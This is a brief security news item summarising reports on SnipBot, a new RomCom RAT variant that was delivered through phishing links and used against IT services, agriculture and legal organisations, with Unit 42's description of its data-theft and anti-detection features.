BleepingComputer reports that organizations in the IT services, agriculture, and legal sectors have been targeted for comprehensive data exfiltration in attacks involving the novel RomCom RAT variant dubbed "SnipBot."
Attackers distributed phishing emails with malicious file download links to facilitate compromise with SnipBot, which includes support for more commands than the previous iteration of RomCom RAT, an analysis from Palo Alto Networks Unit 42 revealed. Aside from enabling specific file type or directory targeting and exfiltrated data compression, SnipBot also facilitates the deployment of archive payloads for extraction. More robust anti-detection capabilities have also been integrated into SnipBot, including window message-based control flow obfuscation, executable and created process hash checks, and other anti-sandboxing techniques, according to Unit 42 researchers, who noted the payload's exploitation of the PuTTY Secure Copy client for data exfiltration activities. Such findings indicate a potential transition to cyberespionage among the malware's operators.
